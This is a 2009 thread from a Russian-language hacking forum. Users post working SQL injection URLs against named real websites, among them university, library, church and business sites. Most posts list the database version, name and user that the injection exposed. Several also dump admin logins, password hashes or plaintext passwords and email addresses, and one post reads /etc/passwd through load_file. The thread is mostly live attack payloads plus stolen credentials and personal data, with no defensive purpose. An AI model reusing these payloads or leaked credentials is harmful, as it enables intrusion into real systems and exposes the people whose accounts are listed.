ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.04.2009, 00:19
|
|
Новичок
Регистрация: 14.04.2009
Сообщений: 6
Провел на форуме:
71588
Репутация:
44
|
|
http://www.buyersfriend.com.au/view_article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,pword ),5,6,7,8,9,10+from+admin--
DB Version: 4.1.22-standard
DB Name: buyersfr_buyfr
DB User: buyersfr_bobby12@localhost
Admin data: merchant:venice
http://www2.diego10.com.br/pages/news/werder_bremen.php?L=en&id=-1+union+select+1,2,concat_ws(0x3a,user,pass,email) ,4,5,6+from+auth--
DB Version: 5.0.51a-24
DB Name: diego
DB User: diego@localhost
Admin data:
icue:*3E9B21C7319E502A3A639A3B26D4384DF1D319B3
x_x_fabiano:*7CB3910B2B51960AAD603627885284A71C9FD 148
leo:*32240CB0851DF159A009865793086FA663A007D4
http://www.phonostar.de/radiomagazin/podcasts/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
DB Version: 5.0.26-log
DB Name: phonostar_global_db
DB User: pscollector@localhost
http://www.cedarpark.org/ministries/auxillary/index.php?id=-1+union+select+1,concat_ws(0x3a,firstname,email,pa ssword),3,4,5+from+cp_users--
DB Version: 5.0.21-community-nt
DB Name: cpc
DB User: cedarpark@localhost
Admin data: Nathan:nate.h@cedarpark.org:81dc9bdb52d04dc20036db d8313ed055
http://www.zonapunk.com.br/ver_materia.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,usuario_logi n,usuario_senha,usuario_email)+from+usuario+limit+ 0,1--
DB Version: 5.0.67-log
DB Name: zonapunk
DB User: zonapunk@abbazaba.dreamhost.com
Admin data:
ayw:e10adc3949ba59abbe56e057f20f883e:alex@midiaweb .com.br
paregonta:e10adc3949ba59abbe56e057f20f883e:allan@m idiaweb.com.br
wlad:1f40d69f9ba61d4f960d7ae837d62c3c:info@zonapun k.com.br
Последний раз редактировалось hitt 1g; 16.04.2009 в 00:34..
|
|
|
16.04.2009, 10:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Решил освоить скуль и вот мой первый результат:
_http://kls.ksu.ru/boduen/bodart_1.php?id=9+union+all+select+1,concat_ws(ver sion(),user(),database()),3,4,5,6,7,8--&num=14000000'
DATABASE():biblfil
USER():filfak@localhost
VERSION():4.0.27-log |
|
|
|
16.04.2009, 12:43
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Код:
http://cmserver.org/library/cat/sex.php?id=-74+union+selecT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1--
db: 4.1.22-log
n_db: db_doctor_4
user: dbu_doctor_2@192.168.5.56
os: slackware-linux-gnu
Код:
http://cmserver.org/admin/ -бейсик авторизация
|
|
|
|
16.04.2009, 12:49
|
|
Новичок
Регистрация: 14.04.2009
Сообщений: 6
Провел на форуме:
71588
Репутация:
44
|
|
http://www.loc.gov/loc/cfbook/relatedorgs/display_cat2.php?cat_ID=-1+union+select+concat_ws(0x3a,username,email,passw ord,admin)+from+users_2+limit+0,1--
DB Version: 5.0.22-log
DB Name: CFB_web
DB User: CFB_user@140.147.249.7
Admin data: jmangin:baaec204688ead3ce9528dc716ed4d7a
http://www.ips.uiuc.edu/isss/pages/index.php?catID=3&pageID=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5+from+administrator--
DB Version: 5.0.67-log
DB Name: isss
DB User: iepadmin@localhost
Admin data: rwsadmin:3a2ca2e1b235eed006a935cadb90227f
http://www.mills.edu/calendarexpress/month.php?catid=-1+union+select+1,concat_ws(0x3a,user_name,password ,email),3+from+ce_user+limit+1,1--
DB Version: 5.0.22-standard
DB Name: calendarexpress
DB User: admin@localhost
Admin data: admin:44f55fe518eb4f59f63642c738481d61
|
|
|
|
16.04.2009, 14:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Студия "Web-техника", основанная в 2003 году, специализируется на разработке Интернет-сайтов
Код:
http://webtechnics.ru/page.php?id=-2'+union+select+1,concat(uname,0x3a,passwd),3+from+geodis_users--+
Админка:
Код:
http://webtechnics.ru/admin.php
|
|
|
|
16.04.2009, 17:25
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.megara.org/cat.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13
Database Version: 5.0.67-log
Database name: megara
User name: megara@10.15.74.1
http://www.megara.org/cat.php?id=-1+UNION+SELECT+1,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13
http://www.mgutheses.org/cat.php?id=38+UNION+SELECT+11111111+LIMIT+1,1/*
Database Version: 5.0.45
Database name: anwar_mgu
User name: anwar_mgu@localhost
Последний раз редактировалось Rubaka; 16.04.2009 в 17:38..
Причина: добавил
|
|
|
|
16.04.2009, 17:50
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Information Architecture Institute>>
Код:
http://iainstitute.org/library/subjectPage.php?id=-12+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)))--+
db: 4.1.16-standard-log
n_db: aifia_library
user: aifia_library_ro@pistone.dreamhost.com
os: pc-linux-gnu |
|
|
|
16.04.2009, 19:34
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://doitwithflair.ca/index.php?page_id=28+and+substring(version(),1,1)= 4
http://scrd.ca/index.php?page_id=359+and+substring(version(),1,1) =5
Последний раз редактировалось jokester; 16.04.2009 в 19:40..
Причина: tourismabbotsford.ca и abbypd.ca БОЯНы
|
|
|
|
16.04.2009, 20:01
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Niobrara County Library>>
Код:
http://www.niobraracountylibrary.org/history/index.php?id=-31'+union+select+unhex(hex(concat_ws(0x3a3a3a,version(),database(),user(),@@version_compile_os))),2,3,4,5,6,7,8--+
4.1.16-standard-log:::library:::dsturman@dimarco.dreamhost.com::  c-linux-gnu
------------------------------
------------------------------
sql - blind
<<About the James A. Gibson Library, Brock University>>
Код:
http://www.library.brocku.ca/subres/guide.php?id=14+and+ascii(substring(version(),1,1))=53--+
db: 5 ....
n_db: library
user: library@localhost |
|
|
|
17.04.2009, 01:24
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208
Репутация:
94
|
|
http://www.scaune-ergonomice.ro уязвим для SQL-injection.
Вот список пользователей.
http://www.scaune-ergonomice.ro/birou.php
?id=2+and+0+union+select+1,2,concat_ws(0x3a,email, parola),4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28
+from+users+limit+1,1+--+
Есть конфликты с кодировкой, решаются через cast. Например:
http://www.scaune-ergonomice.ro/birou.php
?id=2+and+0+union+select+1,2,cast(version()+as+bin ary),4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28
+from+users+limit+1,1+--+
Версия: 4.1.11
Имя базы: eurofoto_scaune
Имя пользователя: scaun@localhost
Доступа к таблице mysql.user нет.
Последний раз редактировалось BHYCHIK; 17.04.2009 в 01:31..
|
|
|
|
|
|
|
|
Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
|
|
|
|
Похожие темы
Линейный вид
